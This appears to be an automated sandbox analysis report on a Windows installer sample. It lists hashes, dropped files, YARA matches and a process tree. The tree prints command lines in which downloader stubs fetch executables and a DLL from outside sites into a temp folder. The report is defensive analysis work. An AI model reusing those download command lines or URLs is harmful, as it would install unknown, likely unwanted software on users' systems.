6d65dbb8a925ae33a585d1851054e78b150eebc36b0d17c8440de4acae9940bc

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
24/12/2023, 22:28

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

15bc87826c55fbfbbeda53b5741b5137.exe
Size

492KB
MD5

15bc87826c55fbfbbeda53b5741b5137
SHA1

56516d7558bb39e755c12441087b6c65180eb8f4
SHA256

6d65dbb8a925ae33a585d1851054e78b150eebc36b0d17c8440de4acae9940bc
SHA512

68f32b1dddd60654cbc3cd4a774c2ae20148e047f388f7174f37fd16f72fd254b837c2caeee6955011c4a6452ab86cbcc05765259908b844879e66259239e438
SSDEEP

6144:Kuk4fqj4HQqF6jtY03ZgLpp6TURimpBwXVUTL7E97IkXQxBRUoz0JehYvH7Aw0v9:w4fwW6peEUBwXVwM9vylzdYvH7AwC

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 6 IoCs

pid	Process
1464	downloaderSTUB.exe
4288	downloaderSTUB.exe
4544	downloaderSTUB.exe
4856	downloaderDDLR.exe
4700	downloaderOFFER0.exe
3120	preinstaller.exe

Loads dropped DLL 25 IoCs

pid	Process
4856	downloaderDDLR.exe
4288	downloaderSTUB.exe
4544	downloaderSTUB.exe
1464	downloaderSTUB.exe
4700	downloaderOFFER0.exe
4856	downloaderDDLR.exe
4288	downloaderSTUB.exe
4544	downloaderSTUB.exe
1464	downloaderSTUB.exe
4700	downloaderOFFER0.exe
4856	downloaderDDLR.exe
4288	downloaderSTUB.exe
4544	downloaderSTUB.exe
1464	downloaderSTUB.exe
4700	downloaderOFFER0.exe
4288	downloaderSTUB.exe
4856	downloaderDDLR.exe
4544	downloaderSTUB.exe
1464	downloaderSTUB.exe
4700	downloaderOFFER0.exe
4856	downloaderDDLR.exe
4288	downloaderSTUB.exe
1464	downloaderSTUB.exe
4544	downloaderSTUB.exe
4700	downloaderOFFER0.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 16 IoCs

installer

resource	yara_rule
behavioral2/files/0x00070000000231fd-1.dat	nsis_installer_1
behavioral2/files/0x00070000000231fd-1.dat	nsis_installer_2
behavioral2/files/0x00070000000231fa-15.dat	nsis_installer_1
behavioral2/files/0x00070000000231fa-15.dat	nsis_installer_2
behavioral2/files/0x00060000000231fe-16.dat	nsis_installer_1
behavioral2/files/0x00060000000231fe-16.dat	nsis_installer_2
behavioral2/files/0x00060000000231fe-19.dat	nsis_installer_1
behavioral2/files/0x00060000000231fe-19.dat	nsis_installer_2
behavioral2/files/0x00070000000231fa-17.dat	nsis_installer_1
behavioral2/files/0x00070000000231fa-17.dat	nsis_installer_2
behavioral2/files/0x00070000000231fd-12.dat	nsis_installer_1
behavioral2/files/0x00070000000231fd-12.dat	nsis_installer_2
behavioral2/files/0x00070000000231fd-11.dat	nsis_installer_1
behavioral2/files/0x00070000000231fd-11.dat	nsis_installer_2
behavioral2/files/0x00070000000231fd-10.dat	nsis_installer_1
behavioral2/files/0x00070000000231fd-10.dat	nsis_installer_2

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4896 wrote to memory of 1464	4896	15bc87826c55fbfbbeda53b5741b5137.exe	89
PID 4896 wrote to memory of 1464	4896	15bc87826c55fbfbbeda53b5741b5137.exe	89
PID 4896 wrote to memory of 1464	4896	15bc87826c55fbfbbeda53b5741b5137.exe	89
PID 4896 wrote to memory of 4288	4896	15bc87826c55fbfbbeda53b5741b5137.exe	94
PID 4896 wrote to memory of 4288	4896	15bc87826c55fbfbbeda53b5741b5137.exe	94
PID 4896 wrote to memory of 4288	4896	15bc87826c55fbfbbeda53b5741b5137.exe	94
PID 4896 wrote to memory of 4544	4896	15bc87826c55fbfbbeda53b5741b5137.exe	93
PID 4896 wrote to memory of 4544	4896	15bc87826c55fbfbbeda53b5741b5137.exe	93
PID 4896 wrote to memory of 4544	4896	15bc87826c55fbfbbeda53b5741b5137.exe	93
PID 4896 wrote to memory of 4856	4896	15bc87826c55fbfbbeda53b5741b5137.exe	92
PID 4896 wrote to memory of 4856	4896	15bc87826c55fbfbbeda53b5741b5137.exe	92
PID 4896 wrote to memory of 4856	4896	15bc87826c55fbfbbeda53b5741b5137.exe	92
PID 4896 wrote to memory of 4700	4896	15bc87826c55fbfbbeda53b5741b5137.exe	91
PID 4896 wrote to memory of 4700	4896	15bc87826c55fbfbbeda53b5741b5137.exe	91
PID 4896 wrote to memory of 4700	4896	15bc87826c55fbfbbeda53b5741b5137.exe	91
PID 4896 wrote to memory of 3120	4896	15bc87826c55fbfbbeda53b5741b5137.exe	90
PID 4896 wrote to memory of 3120	4896	15bc87826c55fbfbbeda53b5741b5137.exe	90
PID 4896 wrote to memory of 3120	4896	15bc87826c55fbfbbeda53b5741b5137.exe	90

C:\Users\Admin\AppData\Local\Temp\15bc87826c55fbfbbeda53b5741b5137.exe
"C:\Users\Admin\AppData\Local\Temp\15bc87826c55fbfbbeda53b5741b5137.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderSTUB.exe
  C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderSTUB.exe /U "http://www.openbitcoin.org/static/dist/obc.exe" /D "C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\stub.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1464
- C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\preinstaller.exe
  C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\preinstaller.exe 0 "Garmin_mapsource_bluechart_g2_vision_veu057r-v09_00-st_petersburg_to_rugen" "Download"
  2⤵
  - Executes dropped EXE
  PID:3120
- C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderOFFER0.exe
  C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderOFFER0.exe /U "http://www.directdownloader.com/toolbars/optimizer.exe" /D "C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\optimizer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4700
- C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderDDLR.exe
  C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderDDLR.exe /U "http://www.directdownloader.com/DirectDownloaderInstaller.exe" /D "C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\DirectDownloaderInstaller.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4856
- C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderSTUB.exe
  C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/updater.exe" /D "C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\updater.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4544
- C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderSTUB.exe
  C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/OpenCL.dll" /D "C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\OpenCL.dll"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderDDLR.exe

Filesize
57KB

MD5
a604fa14baa081679dd326282d403c41

SHA1
1ded86ddd1adcf3fe8dba32c1d65cd924c8be4cb

SHA256
490f1005ecfe7fe052c4c19a221cbd9e2f1956a6d858b971c9f55291847c0d96

SHA512
70dbab0c6ac40dab5e324c128b5b45558ce98d81965c39efff16d4fcf1759784f6aa926180f102e771ca2606446c75d410c916b018993d286f216229b48da22d

Download Submit
C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderDDLR.exe

Filesize
17KB

MD5
c1181d333241159cfb76eb2f572d16db

SHA1
3df6eaf53ad83efd84cabca878fddfcba6a17f6f

SHA256
22952535e492d41abe9e1f5ac5ba66bbbbc90f0b0b9f1c3cc4810da8c855a577

SHA512
2fc082b36a5392b3318440f897d43520735ca15197e478fb7d3c05d3d92126470e9d3a2953b57038d364bc679a6fa89694637ebd6aea13b4d218ad0f1d3ca69e

Download Submit
C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderOFFER0.exe

Filesize
25KB

MD5
5d878ebd6829261c28e463ca5afe6de4

SHA1
c6d835bfaa37cbba43df1e8bf697790070154f26

SHA256
72965829576e2a6a177d7d8baffca632832db368d0bdf39a16570f0b8f1e66ab

SHA512
6b9c535bc20549ac958c90e3c92bde7fedb29f6f0e2a44c4b8575e69e157c30779298a2115713fb6e3ac523db9fbda721924afe82816f861b671296d576ff81c

Download Submit
C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderOFFER0.exe

Filesize
14KB

MD5
b622b8a705136eaea34fa07d746520a3

SHA1
f020fa57c90099d6327c33a540bc7381a3e961a0

SHA256
ad3948cfb13f2390936d12572eafc50267d2ff2be34bfa43325cfa08ceaa4b63

SHA512
9494099ed00d75cd34671a873d522389d3391df1c3501814a8a002f3a61bb2f9efc2317ca59711ccc6e72fe78e8c05bf869d38881a974d2e4b77c983d73d1ea4

Download Submit
C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderSTUB.exe

Filesize
58KB

MD5
c7f6ed56312c8fbb58ae6ed445c38df4

SHA1
e2dba94ef052db774478b9f7198c1a2298b334e5

SHA256
fdb8452173a4f116f6e362ab5466c3c16bf6697502fe3d01db0d82f0e339de24

SHA512
ac43e5bb31c3c0876a7768553916cce76d92088e62594e8463b128a0d6e587c48152a5efcf0b2a5e8fb43028d46913df114ae3c3750b7e6c4212c7044518ba43

Download Submit
C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderSTUB.exe

Filesize
55KB

MD5
95222102f6215397a499b7dcb37260be

SHA1
1b61eb8c3c575a75046535524bb2a2949b5e60ac

SHA256
771c5d5e4e92b0a86a6b9c4e1d501c82ce51d6772f89b33fdde73bb003b79e03

SHA512
87f054897fb46e0ece5c8643aa71804aec27317e2209f9b2bd2724d8d58c5c6f77a50850df6d845195ff9ee26fd101d5c4926bf4c03deada24f5a5808b50dd6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderSTUB.exe

Filesize
42KB

MD5
19857eda29cf443ff11bea2a20dd2452

SHA1
ba6d28a4f77a81b465c33946a76877d939a0a882

SHA256
7794af8a2a61f8a36262a332d676bfcf3ee9392165b4298f0ee55a9ef25d6147

SHA512
7ec458e576cce3f767a219d2579dacb2a4d15f4489a7425ccdeaee8eb061da83bd505c0c545b633ac717687d6490f12979dd4c98ab819120ad36ec727da84ac3

Download Submit
C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\downloaderSTUB.exe

Filesize
30KB

MD5
49b9f325c2acbc25e091d95a14ac2ae1

SHA1
9a3c63629b1d749532f426464d816b1edc52a819

SHA256
583914a66818e18fc226dee35d4fa1a1f741c3bc7873740a0e6c987276420e76

SHA512
1bb438de1aaf18cb17ddb5d9072ce3c9b29dcee5820cfe92fcc2375c78261f13f318538de1bb5e4032e9457dccc2fe9dc3cd17f6e90fd8ceceae684d89c2f201

Download Submit
C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\preinstaller.exe

Filesize
29KB

MD5
7f96b2609b6b9aed3a6d6d2ea94e9f4e

SHA1
2da5aca4efd0c3ef9b1fc3a341f7beadc180e05f

SHA256
d32eebe3587e4af4bf3dc8320f47fb9c3c5f5cbbe05422c20a69a81041c81139

SHA512
f323f5bfdf4feac4336236e4a9c37963748176e87e84c5e7581510d387a2f0becce5258e9765fba12fb72107617f1aee22ceb68eccd77018bef0de05dc9b71fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\831ec435a5bca53c91aa3fb6904c523a\preinstaller.exe

Filesize
36KB

MD5
c687a410ca2388a3166621d8add9d0c8

SHA1
a3da39e4fa1b01c4e6069ac607ab7a2a1a9d006c

SHA256
889425b817c10a85da6cbef25e46428e2574b22814bd49d7723b3016761793a6

SHA512
adefdfdc151abaa6d964b72667d5cce44a47179cf7ab975b5d8c60d6734d69d776d8626d293e0f6ac0b31dfb55f3a9901e9812151293d93bce3368581fba2bb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsb4AF4.tmp\NSISdl.dll

Filesize
14KB

MD5
a5f8399a743ab7f9c88c645c35b1ebb5

SHA1
168f3c158913b0367bf79fa413357fbe97018191

SHA256
dacc88a12d3ba438fdae3535dc7a5a1d389bce13adc993706424874a782e51c9

SHA512
824e567f5211bf09c7912537c7836d761b0934207612808e9a191f980375c6a97383dbc6b4a7121c6b5f508cbfd7542a781d6b6b196ca24841f73892eec5e977

Download Submit
memory/3120-46-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download
memory/4896-45-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download